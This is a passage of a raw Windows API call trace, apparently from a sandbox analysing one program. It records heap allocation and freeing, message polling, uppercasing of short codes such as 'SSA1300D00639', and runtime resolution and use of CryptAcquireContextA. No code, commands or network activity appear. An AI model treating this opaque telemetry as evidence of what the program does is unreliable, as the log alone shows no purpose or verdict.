out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.233] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0257.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0257.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0257.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.233] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0257.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.234] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.237] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0257.237] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.238] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0257.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.238] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.239] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.241] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0257.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.241] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0257.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.242] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.243] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.243] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.243] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.244] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb 